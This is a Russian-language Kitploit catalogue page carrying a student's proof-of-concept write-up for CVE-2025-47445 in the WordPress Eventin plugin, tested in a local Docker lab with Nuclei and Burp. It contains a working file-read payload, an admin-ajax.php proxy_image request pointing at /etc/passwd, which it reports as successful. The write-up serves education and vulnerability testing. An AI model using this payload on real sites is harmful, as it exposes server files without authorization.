Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-47445-PoC — Доказательство концепции для CVE-2025-47445 | Kitploit
Инструменты/GitHubGitHub/inverterad/cve-2025-47445-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

Доказательство концепции для CVE-2025-47445

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47445 PoC

Эта proof of concept основана на школьном задании, где мы хотели найти уязвимый плагин WordPress и протестировать данную уязвимость в локальной контролируемой среде.

Информация
Плагин WordPress:Wordpress Eventin
Версия плагина:4.0.26 (или новее)
Информация о CVE:Project Discovery - Vulnerability library
CVEdetails.com
Полезные инструменты:Wordfence Lab Environment
Docker
Burp Suite
Nuclei

Настройка окружения

Wordfence Docker WordPress Research Lab предоставляет два разных окружения: одно со старой версией PHP, а мы выберем более новое.

root@kitploit:~
# В папке dockerwp84
docker-compose build
docker-compose up -d

После этого я настроил страницу WordPress через localhost:1337. Я скачал плагин Eventin, а именно версию 4.0.26 из магазина плагинов, установил и активировал его через интерфейс WordPress.

Теперь всё должно быть готово к работе.

DAST / Nuclei

Я хочу проверить, сможет ли Nuclei найти интересующую меня CVE, поэтому запускаю экземпляр во временном docker-контейнере.

root@kitploit:~
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

Я запускал Nuclei несколько раз и получал разные результаты, не знаю почему. Но в итоге он находит CVE и ещё пару вещей, которые я специально не искал.

Nuclei screenshot

Burp / Ручное тестирование

Чтобы проверить, могу ли я получить доступ к файлу /etc/passwd, я просто вставляю следующий payload в свой GET-запрос.

root@kitploit:~
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

И это сработало.

Burp screenshot

Выводы

Это было сделано в образовательных целях.

Убедитесь, что вы обновляете всё своё программное обеспечение. Новые CVE обнаруживаются каждый день.

Скачать инструмент